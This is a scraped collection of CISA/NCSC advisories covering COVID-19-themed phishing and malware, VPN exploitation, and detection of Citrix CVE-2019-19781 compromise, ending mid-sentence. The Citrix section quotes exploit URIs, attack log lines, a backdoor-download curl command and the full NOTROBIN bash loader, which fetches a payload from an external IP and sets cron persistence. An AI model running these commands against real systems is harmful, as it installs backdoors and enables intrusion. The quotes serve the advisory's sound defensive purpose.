networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability **so you are collecting the data that will be needed to analyze network intrusions. See the [NCSC introduction to logging security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information: **Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:36:09", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nThis alert provides information on exploitation by cybercriminal and advanced persistent threat (APT) groups of the current coronavirus disease 2019 (COVID-19) global pandemic. It includes a non-exhaustive list of indicators of compromise (IOCs) for detection as well as mitigation advice.\n\nBoth CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors. At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations.\n\nAPT groups and cybercriminals are targeting individuals, small and medium enterprises, and large organizations with COVID-19-related scams and phishing emails. This alert provides an overview of COVID-19-related malicious cyber activity and offers practical advice that individuals and organizations can follow to reduce the risk of being impacted. The IOCs provided within the accompanying .csv and .stix files of this alert are based on analysis from CISA, NCSC, and industry.\n\n**Note: **this is a fast-moving situation and this alert does not seek to catalogue all COVID-19-related malicious cyber activity. Individuals and organizations should remain alert to increased activity relating to COVID-19 and take proactive steps to protect themselves.\n\n### Technical Details\n\n## Summary of Attacks\n\nAPT groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and \u201chack-and-leak\u201d operations.\n\nCybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.\n\nBoth APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. Threats observed include:\n\n * Phishing, using the subject of coronavirus or COVID-19 as a lure,\n * Malware distribution, using coronavirus- or COVID-19- themed lures,\n * Registration of new domain names containing wording related to coronavirus or COVID-19, and\n * Attacks against newly\u2014and often rapidly\u2014deployed remote access and teleworking infrastructure.\n\nMalicious cyber actors rely on basic social engineering methods to entice a user to carry out a specific action. These actors are taking advantage of human traits such as curiosity and concern around the coronavirus pandemic in order to persuade potential victims to:\n\n * Click on a link or download an app that may lead to a phishing website, or the downloading of malware, including ransomware. \n * For example, a malicious Android app purports to provide a real-time coronavirus outbreak tracker but instead attempts to trick the user into providing administrative access to install \"CovidLock\" ransomware on their device.[[1]](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n * Open a file (such as an email attachment) that contains malware. \n * For example, email subject lines contain COVID-19-related phrases such as \u201cCoronavirus Update\u201d or \u201c2019-nCov: Coronavirus outbreak in your city (Emergency)\u201d\n\nTo create the impression of authenticity, malicious cyber actors may spoof sender information in an email to make it appear to come from a trustworthy source, such as the World Health Organization (WHO) or an individual with \u201cDr.\u201d in their title. In several examples, actors send phishing emails that contain links to a fake email login page. Other emails purport to be from an organization\u2019s human resources (HR) department and advise the employee to open the attachment.\n\nMalicious file attachments containing malware payloads may be named with coronavirus- or COVID-19-related themes, such as \u201cPresident discusses budget savings due to coronavirus with Cabinet.rtf.\u201d\n\n**Note: **a non-exhaustive list of IOCs related to this activity is provided within the accompanying .csv and .stix files of this alert.\n\n## Phishing\n\nCISA and NCSC have both observed a large volume of phishing campaigns that use the social engineering techniques described above.\n\nExamples of phishing email subject lines include:\n\n * 2020 Coronavirus Updates,\n * Coronavirus Updates,\n * 2019-nCov: New confirmed cases in your City, and\n * 2019-nCov: Coronavirus outbreak in your city (Emergency).\n\nThese emails contain a call to action, encouraging the victim to visit a website that malicious cyber actors use for stealing valuable data, such as usernames and passwords, credit card information, and other personal information.\n\n## SMS Phishing\n\nMost phishing attempts come by email but NCSC has observed some attempts to carry out phishing by other means, including text messages (SMS).\n\nHistorically, SMS phishing has often used financial incentives\u2014including government payments and rebates (such as a tax rebate)\u2014as part of the lure. Coronavirus-related phishing continues this financial theme, particularly in light of the economic impact of the epidemic and governments\u2019 employment and financial support packages. For example, a series of SMS messages uses a UK government-themed lure to harvest email, address, name, and banking information. These SMS messages\u2014purporting to be from \u201cCOVID\u201d and \u201cUKGOV\u201d (see figure 1)\u2014include a link directly to the phishing site (see figure 2).\n\n\n\n##### Figure 1: UK government-themed SMS phishing\n\n\n\n##### Figure 2: UK government-themed phishing page\n\nAs this example demonstrates, malicious messages can arrive by methods other than email. In addition to SMS, possible channels include WhatsApp and other messaging services. Malicious cyber actors are likely to continue using financial themes in their phishing campaigns. Specifically, it is likely that they will use new government aid packages responding to COVID-19 as themes in phishing campaigns.\n\n## Phishing for credential theft\n\nA number of actors have used COVID-19-related phishing to steal user credentials. These emails include previously mentioned COVID-19 social engineering techniques, sometimes complemented with urgent language to enhance the lure.\n\nIf the user clicks on the hyperlink, a spoofed login webpage appears that includes a password entry form. These spoofed login pages may relate to a wide array of online services including\u2014but not limited to\u2014email services provided by Google or Microsoft, or services accessed via government websites.\n\nTo further entice the recipient, the websites will often contain COVID-19-related wording within the URL (e.g., \u201ccorona-virus-business-update,\u201d \u201ccovid19-advisory,\u201d or \u201ccov19esupport\u201d). These spoofed pages are designed to look legitimate or accurately impersonate well-known websites. Often the only way to notice malicious intent is through examining the website URL. In some circumstances, malicious cyber actors specifically customize these spoofed login webpages for the intended victim.\n\nIf the victim enters their password on the spoofed page, the attackers will be able to access the victim\u2019s online accounts, such as their email inbox. This access can then be used to acquire personal or sensitive information, or to further disseminate phishing emails, using the victim\u2019s address book.\n\n## Phishing for malware deployment\n\nA number of threat actors have used COVID-19-related lures to deploy malware. In most cases, actors craft an email that persuades the victim to open an attachment or download a malicious file from a linked website. When the victim opens the attachment, the malware is executed, compromising the victim\u2019s device.\n\nFor example, NCSC has observed various email messages that deploy the \u201cAgent Tesla\u201d keylogger malware. The email appears to be sent from Dr. Tedros Adhanom Ghebreyesus, Director-General of WHO. This email campaign began on Thursday, March 19, 2020. Another similar campaign offers thermometers and face masks to fight the epidemic. The email purports to attach images of these medical products but instead contains a loader for Agent Tesla.\n\nIn other campaigns, emails include a Microsoft Excel attachment (e.g., \u201c8651 8-14-18.xls\u201d) or contain URLs linking to a landing page that contains a button that\u2014if clicked\u2014redirects to download an Excel spreadsheet, such as \"EMR Letter.xls\u201d. In both cases, the Excel file contains macros that, if enabled, execute an embedded dynamic-link library (DLL) to install the \u201cGet2 loader\" malware. Get2 loader has been observed loading the \u201cGraceWire\u201d Trojan.\n\nThe \"TrickBot\" malware has been used in a variety of COVID-19-related campaigns. In one example, emails target Italian users with a document purporting to be information related to COVID-19 (see figure 3). The document contains a malicious macro that downloads a batch file (BAT), which launches JavaScript, which\u2014in turn\u2014pulls down the TrickBot binary, executing it on the system.\n\n\n\n##### Figure 3: Email containing malicious macro targeting Italian users[[2]](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\nIn many cases, Trojans\u2014such as Trickbot or GraceWire\u2014will download further malicious files, such as Remote Access Trojans (RATs), desktop-sharing clients, and ransomware. In order to maximize the likelihood of payment, cybercriminals will often deploy ransomware at a time when organizations are under increased pressure. Hospitals and health organizations in the United States,[[3]](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>) Spain,[[4]](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>) and across Europe[[5]](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>) have all been recently affected by ransomware incidents.\n\nAs always, individuals and organizations should be on the lookout for new and evolving lures. Both CISA[[6]](<https://www.us-cert.gov/ncas/tips/ST18-271>),[[7]](<https://www.us-cert.gov/Ransomware>) and NCSC[[8]](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>) provide guidance on mitigating malware and ransomware attacks.\n\n## Exploitation of new teleworking infrastructure\n\nMany organizations have rapidly deployed new networks, including VPNs and related IT infrastructure, to shift their entire workforce to teleworking.\n\nMalicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix. Citrix vulnerability, CVE-2019-19781, and its exploitation have been widely reported since early January 2020. Both CISA[[9]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>) and NCSC[[10]](<https://www.ncsc.gov.uk/news/citrix-alert>) provide guidance on CVE-2019-19781 and continue to investigate multiple instances of this vulnerability's exploitation.\n\nSimilarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto continue to be exploited. CISA provides guidance on the Pulse Secure vulnerability[[11]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) and NCSC provides guidance on the vulnerabilities in Pulse Secure, Fortinet, and Palo Alto.[[12]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\nMalicious cyber actors are also seeking to exploit the increased use of popular communications platforms\u2014such as Zoom or Microsoft Teams\u2014by sending phishing emails that include malicious files with names such as \u201czoom-us-zoom_##########.exe\u201d and \u201cmicrosoft-teams_V#mu#D_##########.exe\u201d (# representing various digits that have been reported online).[[13]](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>) CISA and NCSC have also observed phishing websites for popular communications platforms. In addition, attackers have been able to hijack teleconferences and online classrooms that have been set up without security controls (e.g., passwords) or with unpatched versions of the communications platform software.[[14]](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\nThe surge in teleworking has also led to an increase in the use of Microsoft\u2019s Remote Desktop Protocol (RDP). Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online,[[15]](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>) and recent analysis[[16]](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>) has identified a 127% increase in exposed RDP endpoints. The increase in RDP use could potentially make IT systems\u2014without the right security measures in place\u2014more vulnerable to attack.[[17]](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n## Indicators of compromise\n\nCISA and NCSC are working with law enforcement and industry partners to disrupt or prevent these malicious cyber activities and have published a non-exhaustive list of COVID-19-related IOCs via the following links:\n\n * [AA20-099A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.csv>)\n * [A20-099A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml>)\n\nIn addition, there are a number of useful publicly available resources that provide details of COVID-19-related malicious cyber activity:\n\n * Recorded Futures\u2019 report, [_Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide_](<https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf>)\n * DomainTools\u2019 [_Free COVID-19 Threat List - Domain Risk Assessments for Coronavirus Threats_](<https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats>)\n * GitHub list of [IOCs used COVID-19-related cyberattack campaigns](<https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs>) gathered by GitHub user Parth D. Maniar\n * GitHub list of [Malware, spam, and phishing IOCs that involve the use of COVID-19 or coronavirus](<https://github.com/sophoslabs/covid-iocs>) gathered by SophosLabs\n * Reddit master thread to collect [intelligence relevant to COVID-19 malicious cyber threat actor campaigns](<https://www.reddit.com\\\\r\\\\blueteamsec\\\\comments\\\\fiy0i8\\\\master_thread_covid19corona_threat_actor_campaigns\\\\>)\n * Tweet regarding the MISP project\u2019s dedicated [#COVID2019 MISP instance](<https://twitter.com/MISPProject/status/1239864641993551873>) to share COVID-related cyber threat information\n\n### Mitigations\n\nMalicious cyber actors are continually adjusting their tactics to take advantage of new situations, and the COVID-19 pandemic is no exception. Malicious cyber actors are using the high appetite for COVID-19-related information as an opportunity to deliver malware and ransomware, and to steal user credentials. Individuals and organizations should remain vigilant. For information regarding the COVID-19 pandemic, use trusted resources, such as the Centers for Disease Control and Prevention (CDC)\u2019s [COVID-19 Situation Summary](<https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html?CDC_AA_refVal=https%3A%2F%2Fwww.cdc.gov%2Fcoronavirus%2F2019-ncov%2Fsummary.html>).\n\nFollowing the CISA and NCSC advice set out below will help mitigate the risk to individuals and organizations from malicious cyber activity related to both COVID-19 and other themes:\n\n * [CISA guidance for defending against COVID-19 cyber scams](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams>)\n * [CISA Insights: Risk Management for Novel Coronavirus (COVID-19)](<https://www.cisa.gov/sites/default/files/publications/20_0318_cisa_insights_coronavirus.pdf>), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19\n * [CISA Alert: Enterprise VPN Security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>)\n * [CISA webpage providing a repository of the agency\u2019s COVID-19 guidance](<https://www.cisa.gov/coronavirus>)\n * [NCSC guidance to help spot, understand, and deal with suspicious messages and emails](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>)\n * [NCSC phishing guidance for organizations and cyber security professionals](<https://www.ncsc.gov.uk/guidance/phishing>)\n * [NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n * [NCSC guidance on home working](<https://www.ncsc.gov.uk/guidance/home-working>)\n * [NCSC guidance on end user device security](<https://www.ncsc.gov.uk/collection/end-user-device-security/eud-overview/vpns>)\n\n## Phishing guidance for individuals\n\nThe NCSC\u2019s [suspicious email guidance](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>) explains what to do if you've already clicked on a potentially malicious email, attachment, or link. It provides advice on who to contact if your account or device has been compromised and some of the mitigation steps you can take, such as changing your passwords. It also offers NCSC's top tips for spotting a phishing email:\n\n * **Authority **\u2013 Is the sender claiming to be from someone official (e.g., your bank or doctor, a lawyer, a government agency)? Criminals often pretend to be important people or organizations to trick you into doing what they want.\n * **Urgency **\u2013 Are you told you have a limited time to respond (e.g., in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.\n * **Emotion **\u2013 Does the message make you panic, fearful, hopeful, or curious? Criminals often use threatening language, make false claims of support, or attempt to tease you into wanting to find out more.\n * **Scarcity **\u2013 Is the message offering something in short supply (e.g., concert tickets, money, or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.\n\n## Phishing guidance for organizations and cybersecurity professionals\n\nOrganizational defenses against phishing often rely exclusively on users being able to spot phishing emails. However, organizations that widen their defenses to include more technical measures can improve resilience against phishing attacks.\n\nIn addition to educating users on defending against these attacks, organizations should consider NCSC\u2019s guidance that splits mitigations into four layers, on which to build defenses:\n\n 1. Make it difficult for attackers to reach your users.\n 2. Help users identify and report suspected phishing emails (see CISA Tips, [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>) and [Avoiding Social Engineering and Phishing Scams](<https://www.us-cert.gov/ncas/tips/ST04-014>)).\n 3. Protect your organization from the effects of undetected phishing emails.\n 4. Respond quickly to incidents.\n\nCISA and NCSC also recommend organizations plan for a percentage of phishing attacks to be successful. Planning for these incidents will help minimize the damage caused.\n\n## Communications platforms guidance for individuals and organizations\n\nDue to COVID-19, an increasing number of individuals and organizations are turning to communications platforms\u2014such as Zoom and Microsoft Teams\u2014 for online meetings. In turn, malicious cyber actors are hijacking online meetings that are not secured with passwords or that use unpatched software.\n\n**Tips for defending against online meeting hijacking** (Source: [FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>), FBI press release, March 30, 2020):\n\n * Do not make meetings public. Instead, require a meeting password or use the waiting room feature and control the admittance of guests.\n * Do not share a link to a meeting on an unrestricted publicly available social media post. Provide the link directly to specific people.\n * Manage screensharing options. Change screensharing to \u201cHost Only.\u201d\n * Ensure users are using the updated version of remote access/meeting applications.\n * Ensure telework policies address requirements for physical and information security.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CovidLock ransomware exploits coronavirus with malicious Android app. TechRepublic.com. March 17, 2020.](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n\n[[2] TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails. Bleeping Computer. March 6, 2020.](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\n[[3] Maze Ransomware Continues to Hit Healthcare Units amid Coronavirus (COVID-19) Outbreak. Security Boulevard. March 19, 2020.](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>)\n\n[[4] Spanish hospitals targeted with coronavirus-themed phishing lures in Netwalker ransomware attacks. Computing.co.uk. March 24, 2020.](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>)\n\n[[5] COVID-19 Testing Center Hit By Cyberattack. Bleeping Computer. March 14, 2020.](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>)\n\n[[6] CISA Tip: Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>)\n\n[[7] CISA Ransomware webpage](<https://www.us-cert.gov/Ransomware>)\n\n[[8] NCSC Guidance: Mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n\n[[9] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[10] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[11] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[12] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[13] COVID-19 Impact: Cyber Criminals Target Zoom Domains. Check Point blog. March 30, 2020.](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>)\n\n[[14] FBI Press Release: FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\n[[15] Microsoft Security blog: Human-operated ransomware attacks: A preventable disaster. March 5, 2020. ](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>)\n\n[[16] Reposify blog: 127% increase in exposed RDPs due to surge in remote work. March 30. 2020.](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>)\n\n[[17] CISA Tip: Securing Network Infrastructure Devices](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nApril 8, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-08T12:00:00", "type": "ics", "title": "COVID-19 Exploited by Malicious Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-04-08T12:00:00", "id": "AA20-099A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-099a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:37:03", "description": "### Summary\n\nUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nThough mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.\n\nCompromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.\n\nContact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.\n\n### Technical Details\n\n## Detection\n\nCISA has developed the following procedures for detecting a CVE-2019-19781 compromise. \n\n#### HTTP Access and Error Log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nThe impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`. Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.\n\n * `'*/../vpns/*'`\n * `'*/vpns/cfg/smb.conf'`\n * `'*/vpns/portal/scripts/newbm.pl*'`\n * `'*/vpns/portal/scripts/rmbm.pl*'`\n * `'*/vpns/portal/scripts/picktheme.pl*'`\n\nNote: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\nPer TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a GET request to an XML file. If any exploitation activity exists\u2014attempted or successful\u2014analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak\u2019s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n`10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] \"POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 200 143 \"https://10.1.1.2/\" \"USERAGENT \"`\n\n`10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] \"GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1\" 200 941 \"-\" \"USERAGENT\"`\n\nAdditionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n`grep -iE 'POST.*\\.pl HTTP/1\\.1\\\" 200 ' /var/log/httpaccess.log -A 1`\n\n`grep -iE 'GET.*\\.xml HTTP/1\\.1\\\" 200' /var/log/httpaccess.log -B 1`\n\n#### Running Processes Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nReviewing the running processes on a system suspected of compromise for processes running under the `nobody `user can identify potential backdoors.\n\n`ps auxd | grep nobody`\n\nAnalysts should review the `ps` output for suspicious entries such as this:\n\n`nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `\u2013 sh -c uname &amp; curl -o \u2013 http://10.1.1.2/backdoor`\n\nFurther pivoting can be completed using the Process ID from the PS output:\n\n`lsof -p <pid>`\n\nDue to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.\n\n### Checking for NOTROBIN Presence\n\n**Context: **Host Hunt\n\n**Type:** Methodology\n\n`pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k`\n\n`hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o`\n\n`/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *`\n\n`/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &\"`\n\nThe above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.\n\nRunning the command `find / -name \".init\" 2> /tmp/error.log` should return the path to the created staging directory while taking all of the errors and creating a file located at `/tmp/error.log`.\n\n### Additional /var/log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAnalysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should 